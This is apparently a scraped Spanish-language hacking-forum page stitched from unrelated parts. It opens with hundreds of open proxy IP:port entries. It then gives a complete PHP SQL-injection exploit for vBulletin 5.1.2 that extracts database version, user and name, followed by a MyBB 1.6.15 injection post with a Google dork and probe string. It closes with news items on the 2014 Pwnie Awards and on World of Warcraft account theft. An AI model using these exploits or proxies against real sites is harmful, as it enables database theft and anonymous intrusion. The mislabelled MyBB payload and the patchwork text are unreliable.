183.238.133.43:80
203.185.12.196:80
183.223.243.168:8123
183.221.53.11:8123
183.221.53.229:8123
183.221.53.243:8123
183.222.153.138:8123
183.222.153.57:8123
183.222.158.211:8123
183.222.183.90:8123
183.223.13.48:8123
183.220.199.33:8123
183.220.232.60:8123
123.110.228.140:8088
123.110.32.177:8088
123.138.68.172:8000
173.201.183.172:8000
182.34.50.74:8585
183.136.221.6:3128
183.221.220.198:8123
117.174.227.56:8123
117.174.228.149:8123
117.174.228.4:8123
117.175.196.45:8123
117.175.212.40:8123
117.175.212.4:8123
117.175.213.137:8123
118.175.9.242:8080
119.176.231.28:8585
121.52.229.51:3128
122.53.78.131:8080
117.176.24.99:8123
117.177.173.227:8123
117.27.157.111:8081

117.172.77.134:8123
117.172.98.36:8123
117.173.115.59:8123
117.173.116.54:8123
117.173.203.120:8123
117.173.244.178:8123
117.173.254.245:8123
117.173.254.44:8123
114.40.90.138:8080
114.41.67.167:8088
117.139.44.210:8123
85.26.146.170:80
114.37.198.211:8088
114.37.84.150:8088
114.40.202.70:8088
112.5.253.83:80
112.96.28.46:80
112.96.28.47:80
113.140.25.4:81
114.215.131.118:80
114.215.179.96:80
114.215.190.147:80
114.26.19.251:8088
114.26.213.202:8088
1.161.101.46:8088
103.224.81.170:80
103.9.22.96:80
109.87.146.155:80
110.187.142.154:8585
111.10.98.25:8123
111.13.13.135:80
111.13.13.138:80
111.206.125.74:8080
111.206.125.75:8080
111.206.125.77:8080
111.206.27.6:8080
111.240.98.134:8088
111.252.248.4:8088
111.254.137.100:8088
111.254.171.29:8088
122.136.46.151:80
54.191.147.210:80
54.209.55.22:80
54.251.165.35:5001
69.10.137.139:3128
213.149.105.12:8080
219.133.31.120:8888
223.86.127.38:8123
202.98.123.126:8080
207.87.237.220:3128
183.62.60.101:80
183.222.93.157:8123
183.223.11.27:8123
183.223.156.32:8123
183.223.173.111:8123
183.223.21.149:8123
183.223.243.168:8123
183.223.34.244:8123
183.223.79.2:8123
183.223.80.71:8123
183.224.1.112:80
183.224.1.112:8080
116.236.216.116:8080
117.166.81.222:8123
117.173.241.143:8123
117.18.79.56:80
121.14.9.76:80
125.227.240.212:8080
173.201.183.172:8000
183.136.221.6:3128
147.210.5.192:80

117.135.194.140:82
218.203.13.185:80
69.10.137.138:3128
69.10.137.139:3128
122.96.59.107:81
209.170.151.142:7808
37.239.46.10:80
37.239.46.18:80
37.236.167.250:80
37.239.46.2:80

88.204.134.214:80

191.103.3.127:8080
222.87.129.30:80
113.57.252.107:80
58.215.142.208:80
183.141.170.45:80
183.219.225.14:8123
183.221.185.59:8123
183.221.54.8:8123
183.222.158.211:8123
183.228.209.246:8123
223.87.190.142:8123
36.7.246.116:8585
112.5.253.83:80
123.161.57.224:1284
183.224.1.112:8080
222.74.6.32:8000
106.112.80.71:8585
111.13.109.52:80
111.13.109.54:80
114.112.91.114:90
114.112.91.115:90
203.195.181.103:8888
223.85.150.85:8123
61.50.245.163:8000
106.3.40.249:8081
117.175.34.154:8123
117.176.164.140:8123
117.25.129.238:8888
120.202.249.230:80
183.217.35.196:8123
183.220.158.36:8123
183.223.21.144:8123
183.224.1.115:8080
183.224.1.116:8080
218.201.38.49:80
218.204.66.176:8123
58.68.246.12:18080
111.11.228.10:81
111.11.228.10:82
111.11.228.9:80
111.11.228.9:83
112.96.28.49:80
120.131.66.254:80
120.197.85.117:88
120.203.214.147:81
120.203.214.147:83
122.96.59.107:81
183.203.22.72:80
183.60.103.1:80
183.60.103.2:80
183.60.103.3:80
218.75.155.242:8888
222.74.6.10:8000
222.74.6.48:8000
60.13.74.183:81
60.13.74.183:83
85.26.146.170:80
113.196.77.88:80
59.175.137.83:88
111.11.228.9:81
114.112.91.116:90
111.10.118.155:8123
111.10.144.230:8123
111.11.228.10:80
117.175.228.199:8123
117.177.172.244:8123
117.177.174.111:8123
122.96.59.106:82
202.108.50.75:80
210.51.56.198:808
221.178.76.234:8123
222.216.109.114:3128
113.140.25.4:81
117.135.194.140:80
117.175.34.198:8123
120.203.214.147:84
120.203.215.8:81
183.221.170.57:8123
183.221.245.198:80
212.248.12.147:443
112.45.203.148:8123
117.173.115.76:8123
117.173.60.225:8123
183.141.79.126:80
183.220.153.254:8123
223.86.127.78:8123
223.86.213.64:8123
223.87.120.38:8123
112.18.163.91:8123
112.44.233.76:8123
113.214.13.1:8000
117.172.68.192:8123
117.173.119.193:8123
117.175.33.148:8123
182.254.138.223:8088
183.220.199.239:8123
183.221.174.72:8123
183.223.11.7:8123
183.223.170.49:8123
183.228.222.237:8123
218.207.54.58:8123
223.86.101.178:8123
223.86.118.220:8123
223.86.221.16:8123
111.11.228.81:80
111.124.158.190:8585
111.13.109.51:80
111.13.109.53:80
111.13.87.173:8081
117.175.213.244:8123
120.203.214.147:82
120.203.214.182:81
120.203.214.182:84
120.203.215.8:80
120.203.215.8:83
120.203.215.8:84
121.14.138.56:81
183.223.87.132:8123
183.230.53.202:8123
210.13.67.74:80
111.10.144.41:8123
111.11.228.9:82
111.9.244.50:8123
112.3.204.37:8123
115.228.60.241:80
117.173.242.52:8123
117.175.119.226:8123
117.176.23.211:8123
117.177.174.54:8123
183.219.159.106:8123
223.86.10.159:8123
46.8.22.172:80
112.18.143.142:8123
112.248.246.158:8585
112.96.28.46:80
119.163.47.27:8118
121.63.116.186:18186
183.219.88.140:8123
112.90.239.223:80
113.57.230.49:81
117.165.30.66:8123
117.175.114.8:8123
117.175.34.232:8123
117.176.12.14:8123
120.203.214.182:80
183.220.154.208:8123
183.221.217.153:8123
183.221.245.207:80
183.221.50.154:8123
183.223.159.251:8123
223.86.66.52:8123
112.18.143.74:8123
113.196.77.92:80
116.233.145.251:80
117.164.159.125:8123
117.166.111.56:8123
218.107.217.70:3129
223.86.127.38:8123
60.13.74.183:843
111.10.144.41:8123
111.11.228.9:82
112.248.246.158:8585
115.228.60.241:80
117.173.108.154:8123
119.163.47.27:8118
183.219.159.106:8123
183.222.174.54:8123
221.178.30.115:8123
223.84.28.25:8123
46.8.22.172:80
112.45.212.218:8123
112.90.239.223:80
113.57.230.49:81
117.165.30.66:8123
117.175.34.232:8123
120.203.214.182:80
183.220.154.208:8123
183.221.217.153:8123
183.221.245.207:80
183.221.50.154:8123
183.223.159.251:8123
223.86.66.52:8123
223.87.189.31:8123
111.11.228.81:80
111.13.87.173:8081
120.203.214.182:84
120.203.215.8:80
120.203.215.8:83
120.203.215.8:84
182.254.138.223:8088
223.84.104.78:8123
113.196.77.92:80
116.233.145.251:80
218.107.217.70:3129
60.13.74.183:843
111.124.158.190:8585
111.13.109.51:80
111.13.109.53:80
112.96.28.46:80
117.141.9.67:808
120.203.214.147:82
120.203.214.182:81
121.14.138.56:81
121.63.116.186:18186
183.219.88.140:8123
183.224.1.30:80
107.150.224.29:3128
107.150.224.29:8080
181.48.214.242:3128
111.206.254.29:80
113.140.25.4:81
117.21.192.11:80
119.247.66.251:80
119.90.36.42:80
124.72.94.149:81
182.118.31.110:80
188.130.128.243:80
190.107.68.18:3128
190.12.86.213:3128
218.240.156.82:80
122.155.165.128:3128
124.72.94.149:83
5.11.172.81:8080
115.182.64.108:8080
116.228.80.186:8080
123.125.114.167:80
190.63.139.75:3128
210.75.14.157:80
213.8.213.0:80
218.107.217.70:3129
218.65.132.38:80
1.206.164.198:18637
112.45.212.218:8123
112.90.239.223:80
113.57.230.49:81
117.165.30.66:8123
117.175.114.8:8123
117.175.34.232:8123
117.176.23.211:8123
120.203.214.182:80
183.220.154.208:8123
183.221.191.124:8123
183.221.217.153:8123
183.221.245.207:80
183.221.48.219:8123
183.221.50.154:8123
183.222.88.15:8123
183.223.159.251:8123
183.228.222.201:8123
223.85.151.116:8123
223.86.66.52:8123
223.87.189.31:8123
111.10.144.41:8123
111.11.228.9:82
111.9.244.50:8123
112.18.166.171:8123
112.248.246.158:8585
115.228.60.241:80
117.139.38.181:8123
117.173.108.154:8123
117.175.119.226:8123
119.163.47.27:8118
14.17.93.126:808
183.219.159.106:8123
183.222.174.54:8123
221.178.30.115:8123
223.86.10.159:8123
223.87.63.180:8123
46.8.22.172:80
113.196.77.92:80
116.233.145.251:80
117.164.159.125:8123
183.216.170.66:8123
218.107.217.70:3129
60.13.74.183:843
111.11.228.81:80
111.13.87.173:8081
117.172.68.192:8123
117.175.213.244:8123
117.176.6.21:8123
120.203.214.182:84
120.203.215.8:80
120.203.215.8:83
120.203.215.8:84
182.254.138.223:8088
183.220.196.56:8123
183.221.174.72:8123
183.223.87.132:8123
183.230.53.202:8123
223.84.104.78:8123
223.84.4.113:8123
223.86.118.220:8123
223.87.58.151:8123
111.124.158.190:8585
111.13.109.51:80
111.13.109.53:80
112.96.28.46:80
120.203.214.147:82
120.203.214.182:81
121.14.138.56:81
121.63.116.186:18186
113.10.157.87:8888
187.4.49.93:3128
203.172.222.38:8080
180.250.219.226:8080
190.85.83.181:80
5.11.163.184:8080
190.205.151.127:8080
proxy2.com:80
181.52.246.86:8080
112.215.10.166:8080
46.175.184.245:9999
5.11.172.32:8080
183.88.233.159:8080
186.93.92.243:8080
186.95.46.21:8080
190.202.227.203:8080
62.255.244.71:80
5.11.170.237:8080
213.8.213.0:80IL213.8.213.02014-08-20
178.149.11.173:80
46.13.10.218:3128
41.191.235.78:8000
5.11.164.159:8080
186.90.98.9:8080
186.91.180.96:8080
190.78.98.163:8080
200.84.87.105:8080
186.94.36.242:8080
190.77.164.216:8080
200.109.146.190:8080
210.209.118.57:8081
186.88.164.221:8080
190.36.140.253:8080
201.211.96.52:8080
190.101.32.99:8080
201.243.167.25:8080
201.221.133.86:8080
217.169.215.175:6666
5.11.172.140:8080
186.88.112.183:8080
186.88.121.152:8080
190.198.95.14:8080
190.37.64.53:8080
190.199.211.131:8080
181.65.183.42:3128
190.39.90.152:8080
201.211.96.21:8080
89.132.175.47:80
89.132.175.47:8080
186.94.47.5:8080
27.111.38.91:8080
182.23.24.10:3128
168.63.152.29:8888
186.93.62.129:8080
202.143.148.58:8080
5.11.168.195:8080
186.215.231.211:8080
210.57.208.14:443
36.74.192.34:8080
213.8.213.0:80
41.210.164.250:8080
5.11.168.19:8080
186.89.15.127:8080
103.11.116.46:8080
41.205.17.141:8080
103.226.1.186:8080
182.52.2.129:80
190.201.172.104:8080
121.167.201.238:8080
49.231.10.107:80
103.9.124.83:80
190.78.32.30:8080
211.219.83.56:80
190.77.33.207:8080
41.168.12.13:3128
201.18.107.234:3128
186.94.122.97:8080
87.254.138.11:8080
209.203.212.4:3128
186.90.44.116:8080
187.240.117.148:3128
189.254.87.227:8080
190.36.135.196:8080
27.131.173.2:8080
107.150.10.66:80
112.142.128.147:80
180.248.215.63:80
201.249.202.166:8089
178.166.155.36:8080
186.88.238.215:8080
191.240.136.35:8080
201.242.84.126:8080
190.39.103.54:8080
190.154.40.42:8080
92.255.246.14:8080
107.150.14.57:8080
122.252.229.130:8080
186.93.130.93:8080
189.63.184.141:3128
54.166.39.85:8080
189.124.135.121:8080
190.248.55.36:80
190.198.65.66:8080
183.136.221.6:3128
190.38.117.24:8080
201.243.62.164:8080
182.52.141.3:8080
201.242.72.85:8080
66.165.197.109:9064
133.242.53.172:8080
182.253.250.105:8080
189.103.161.242:3128
196.46.71.251:3128
38.109.218.156:7808
46.8.22.172:80
111.249.246.1:8088
118.175.9.242:8080
85.15.176.223:8080
88.159.100.200:80
67.43.44.62:8118
118.97.100.227:8080
221.10.102.199:82
118.97.100.227:8080
177.99.176.146:8080
221.10.102.199:82
222.240.175.79:8580
78.109.137.225:3128
180.252.181.15:8080
186.93.197.85:8080
190.203.187.165:8080
190.207.216.183:8080
221.5.69.51:80
118.97.100.227:8080
221.10.102.199:82
182.93.228.150:8080
186.91.53.234:8080
190.36.140.18:8080
67.43.41.112:3128

119.97.164.48:8085
149.255.255.242:80
123.190.46.20:8080

190.205.144.187:8080
199.175.52.252:3128
88.249.50.113:8080
107.170.236.206:3128
67.43.37.106:8080
67.43.37.115:8080
67.43.37.189:8080
67.43.37.191:8118
67.43.41.14:3128
67.43.41.243:8080
120.203.214.147:83
8.225.195.209:8080
192.3.171.92:80
124.72.94.149:81
183.88.233.156:8080
188.165.158.83:3128
182.93.219.190:8080
186.91.163.223:8080
130.222.189.44:3128
190.205.171.75:8080
201.209.132.178:8080
193.36.34.11:3128
167.88.43.241:3128
177.69.195.4:3128
199.167.228.36:3128
107.170.236.206:3128
144.76.245.239:3128
200.150.66.226:3128
69.10.137.138:3128
89.248.118.232:3128

192.227.146.119:8089
202.109.163.75:8085
211.159.68.248:8088
218.4.236.117:80
120.202.249.230:80
118.163.47.126:8089
119.46.110.17:80
119.46.110.17:8080
202.103.150.70:8088
134.19.178.70:7808
185.49.15.25:8089
192.227.146.119:8089
202.109.163.75:8085
211.159.68.248:8088
118.163.47.126:8089
119.46.110.17:80
119.46.110.17:8080
119.97.164.48:8085
121.12.255.212:8085
162.216.155.136:3127
222.74.6.32:8000
46.59.39.185:8888
61.7.149.69:8080
1.234.75.53:8888
111.10.13.151:8123
111.205.122.222:80
120.202.249.230:80
180.252.181.15:8080
112.90.51.226:3128
58.251.78.71:8088
117.174.207.81:8123
117.175.192.21:8123
117.175.212.4:8123
183.221.191.98:8123
183.223.29.102:8123
183.224.1.114:80
112.78.11.40:808
117.175.196.138:8123
183.224.1.113:8080
183.224.1.55:80
223.87.61.125:8123
117.175.214.174:8123
202.103.150.70:8088
220.133.155.192:808
183.224.1.115:80
183.224.1.116:8080
183.224.1.99:8080
223.85.156.187:8123
223.86.135.212:8123
94.247.25.163:80
196.46.71.251:80
116.90.208.47:8080
183.89.40.238:3128
116.11.32.41:3128
120.202.249.230:80
61.19.42.244:8080
110.77.248.191:3128
113.132.82.147:8000
117.36.231.239:9999
200.87.138.146:8080
91.215.144.52:3128
109.175.8.57:8080
118.244.239.2:3128
202.43.188.11:8080
41.72.105.38:3128
61.156.235.170:9999
79.136.250.38:3128
119.46.110.17:8080
119.46.110.17:8080
202.103.150.70:8088
202.29.235.122:3129
220.227.50.164:3128
59.46.220.214:9000
190.66.20.212:8080
83.167.67.34:8080
120.202.249.230:80
211.144.81.68:18000



vBulletin 5.1.2 Exploit SQL Injection




Cita:vBulletin (abreviado como vB) es un software para crear foros en internet desarrollado por vBulletin Solutions Inc. Al estar basado en PHP y MySQL ofrece gran capacidad de adaptación en múltiples plataformas y flexibilidad para añadir modificaciones. vBulletin ofrece una administración muy sencilla, permitiendo fácilmente su uso a cualquier tipo de usuario, además ofrece varias opciones:



Exploit :


Cita:
<?php

/*
Author: Nytro
Powered by: Romanian Security Team
Price: Free. Educational.
*/


error_reporting(E_ALL);
ini_set('display_errors', 1);


// Get arguments


$target_url = isset($argv[1]) ? $argv[1] : 'h5';
$expression = str_replace('/', '\\/', $target_url);


// Function to send a POST request


function httpPost($url,$params)
{
$ch = curl_init($url);


curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Accept: application/json, text/javascript, */*; q=0.01',
'X-Requested-With: XMLHttpRequest',
'Referer: https://rstforums.com/v5/memberlist',
'Accept-Language: en-US,en;q=0.5',
'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
));


$output = curl_exec($ch);

if($output == FALSE) print htmlspecialchars(curl_error($ch));


curl_close($ch);
return $output;
}


// Function to get string between two other strings


function get_string_between($string, $start, $end)
{
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}


// Get version


print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
print "Version: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1 
,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression
. '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];

$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version( ),' .
$letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get user


print "\r\nUser: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1 
,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression
. '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];


$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter
. ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get database


print "\r\nDatabse: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), 
1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression
. '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];


$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), ' .
$letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


print "\r\n"


?>




 Creditos:sniffer



MyBB 1.6.15 SQL Injection




Cita:MyBB (abreviatura de MyBulletinBoard) es un sistema de gestión foros gratuito y de código abierto. Está programado en el lenguaje PHP y soporta bases de datosMySQLPostgreSQL y SQLite. Permite configurar replicación maestro/esclavo y tolerancia a fallos en la base de datos.



***************************************************

# Title: MyBB 1.6.15 - SQL Injection

# Google Dork: intext:"Powered By MyBB"

# Date: 15.08.2014

# Author: DemoLisH

# Vendor Homepage: http://www.mybb.com/

# Software Link: http://www.mybb.com/downloads

# Version: 1.6.15

# Contact: onur@b3yaz.org

# Video: youtube/watch?v=_29v1YEZE2s

***************************************************

[~#~] SQL Injection in Private Messages ( User CP )

Go to -> Inbox, for example:

localhost/private.php

Search at the following code Keywords:


<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

***************************************************


Es la ultima version de MyBB ,Solo hay que poner el codigo en la busqueda del mensaje privado.







[~#~] Thanks To:

Mugair, X-X-X, PoseidonKairos, DexmoD, Micky, BIGERAN and

moder sniffer por subirlo


Pwnie Awards 2014




El 6 de Agosto, se celebró la entrega de premios de los Pwnie Awards 2014, como todos los años, durante el congreso de seguridad Black Hat USA en Las Vegas.


Esta claro que este año, reina en casi todas las categorías en las que aplique, la vulnerabilidad de OpenSSL Heartbleed, que hizo las delicias de todos al poder comprobar su facilidad en la explotación y como consiguió romper el propósito del servicio.

Las categorías de premios para este año son:

  • Best Server-Side Bug - Mejor vulnerabilidad del lado del servidor
  • Best Client-Side Bug - Mejor vulnerabilidad del lado del cliente
  • Best Privilege Escalation Bug - Mejor vulnerabilidad que permita escalada de privilegios
  • Most Innovative Research - Mejor trabajo de investigación
  • Lamest Vendor Response - Respuesta más absurda por parte de un fabricante
  • Best Song - Mejor canción
  • Most Epic FAIL - El FAIL más épico
  • Epic Ownage - El compromiso/incidente/brecha de seguridad más épico

Si bien todavía no tenemos los resultados de los ganadores, por el momento enumeramos a continuación, para cada una de las categorías, los candidatos a llevarse esta peculiar estatuilla:

  • Best Server-Side Bug - Mejor vulnerabilidad del lado del servidor
    • Abusing JSONP with Rosetta Flash (CVE-2014-4671) - Michele Spagnuolo
    • Heartbleed (CVE-2014-0160) - Neel Mehta and Codenomicon - GANADOR
    • IPMI: Sold Down the River - Dan Farmer
    • Embedded Device Hacking - Craig Heffner

  • Best Client-Side Bug - Mejor vulnerabilidad del lado del cliente
    • Google Chrome Arbitrary Memory Read Write Vulnerability (CVE-2014-1705) - Geohot - GANADOR
    • Heartbleed (CVE-2014-0160) - Neel Mehta and Codenomicon
    • Pwn4Fun Safari vulnerability (CVE-2014-1300) - Ian Beer
    • Goto Fail (CVE-2014-1266) - Anonymous

  • Best Privilege Escalation Bug - Mejor vulnerabilidad que permita escalada de privilegios
    • AFD.sys Dangling Pointer Vulnerability (CVE-2014-1767) - Sebastian Apelt - GANADOR
    • VirtualBox VM Breakout using 3D Acceleration (CVE-2014-0981) - Francisco Falcon
    • Linux Futex Bug (CVE-2014-3153) - Comex and Geohot
    • evasi0n iOS 7.0 jailbreak - evad3rs
    • Pangu iOS 7.1 Jailbreak - Pangu, Stefan Esser y otros

  • Most Innovative Research - Mejor trabajo de investigación
    • Hardware-assisted Memory Corruptions - Ralf-Philipp Weinmann
    • Bypassing Windows 8.1 Mitigations using Unsafe COM Objects - James Forshaw
    • RSA Key Extraction via Low-Bandwidth Acoustic Cryptanalysis - Daniel Genkin, Adi Shamir, Eran Tromer - GANADOR
    • Windows 8 UEFI Secure Boot Bypasses Yuriy Bulygin, Andrew Furtak, Oleksandr Bazhaniuk, John Loucaides from Intel Security, Corey Kallenberg, Xeno Kovah, John Butterworth, Sam Cornwell
    • Hacking Blind - Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazieres, Dan Boneh

  • Lamest Vendor Response - Respuesta más absurda por parte de un fabricante
    • OpenCart PHP Object Injection Vulnerability - Daniel de OpenCart
    • Fired, I? - FireEye
    • AVG Remote Administration Insecure "By Design" - AVG - GANADOR
    • Faulty Ignition Switch - General Motors

  • Best Song - Mejor canción
    • "I'm a C I Double S P" - Host Unknown
    • "Memory Corruption" - NYAN
    • "Expect Us (We Are Anonymous)" - Z0ph0kl3z
    • "Security Kate" - Dale Chase
    • "The SSL Smiley Song" - 0xabad1dea - GANADOR

  • Most Epic FAIL - El FAIL más épico
    • Goto Fail - Apple - GANADOR
    • Heartbleed - Open Source Community
    • Target Breach - Target
    • ISC2 Optional Membership Fee - ISC2

  • Epic Ownage - El compromiso/incidente/brecha de seguridad más épico
    • Heartbleed (CVE-2014-0160) - Neel Mehta and Codenomicon
    • Target Breach - Anonymous
    • Inputs.io - Anonymous
    • Mt. Gox - Mark Karpelès - GANADOR

Autor: José A. Guasch


World of Warcraft cuenta hackeada - ¿Deben enfrentarse a la cárcel los ladrones?






Cuenta hackers y ladrones que saquean armas mágicas, armaduras y la moneda del juego ganado duro por lo  jugadores en títulos multijugador masivos como World of Warcraft debe enfrentar las mismas penas que los ladrones del mundo real, sugerido por un político .

 El parlamentario británico Mike Weatherley, asesor jefe del primer ministro David Cameron en la propiedad intelectual, sugiere que los delitos relacionados con objetos virtuales con valor monetario del mundo real deben ser tratados de la misma manera que los robos sin conexión, según un informe publicado en The Independent. 

 Los jugadores que roban artículos virtuales en los juegos en línea, tales como los casos en que un mundo de Warcraft cuenta de hacked deben recibir las mismas penas que los ladrones 'la vida real', el MP sugirieron, según una entrevista con la emisora ​​de radio NewsTalk. 


¿ World of Warcraft cuenta  hackeada?


 Weatherley es un jugador del juego de fantasía populares - que es un objetivo constante para los cibercriminales debido a su gran base de jugadores y el correspondiente alto valor de los objetos en el juego. Situaciones en las que los jugadores encuentran su World of Warcraft hackeado son comunes, y cyberciminals incluso lavar dinero a través de subastas en el juego. 

 En declaraciones a Buzzfeed, el parlamentario dijo que las autoridades no deben perder el tiempo en los robos a pequeña escala. 

 "Es una cosa escala también", dijo. "Si usted es un verdadero hacker, por así decirlo, y que has robado el dinero de miles de cuentas, entonces creo que eso es un problema de robo en general que debe ser abordado muy seriamente." 

 Tales artículos son comúnmente robados por hackers cuyo objetivo  son las cuentas de los jugadores - ya sea con malware o ataques de phishing. Una vez que una cuenta se ve comprometida, los delincuentes venden artículos para la moneda del juego, que pueden ser canjeados por dinero real en varios sitios especializados.

 A Vivimos guía de seguridad para las estafas más comunes que pueden conducir a robo de cuenta en los juegos en línea se esbozan algunos de los riesgos que enfrentan los jugadores en línea.

 La mayoría de los juegos en línea incluyen mecanismos para evitar el robo directo - pero los crímenes perpetrados a través de malware o phishing a menudo son castigados por las compañías de juegos, en lugar de hacer cumplir la ley, a través de sanciones, como la prohibición, cuenta suspenson o la eliminación de grandes cantidades de la moneda del juego. 

 "Si usted ha pasado £ 500 en la construcción de sus fuerzas armadas y alguien se los lleva en línea, supongo que se puede sentir hecho-por duro y quiere que su £ 500 de vuelta", dijo Weatherley. "La gente no debería estar haciéndolo."

 "La percepción de algunas personas es si robas en línea es menos de un crimen que si robas físicamente. Si realmente es alguien que ha pagado en el juego y que han tenido que robado, eso es probablemente no es diferente a algo en el mundo físico ".

 Mike Penning, el Ministro de Estado de Justicia respondió que la sentencia en estos casos era "un asunto para los tribunales."

Autor: Rob Waugh, We Live Security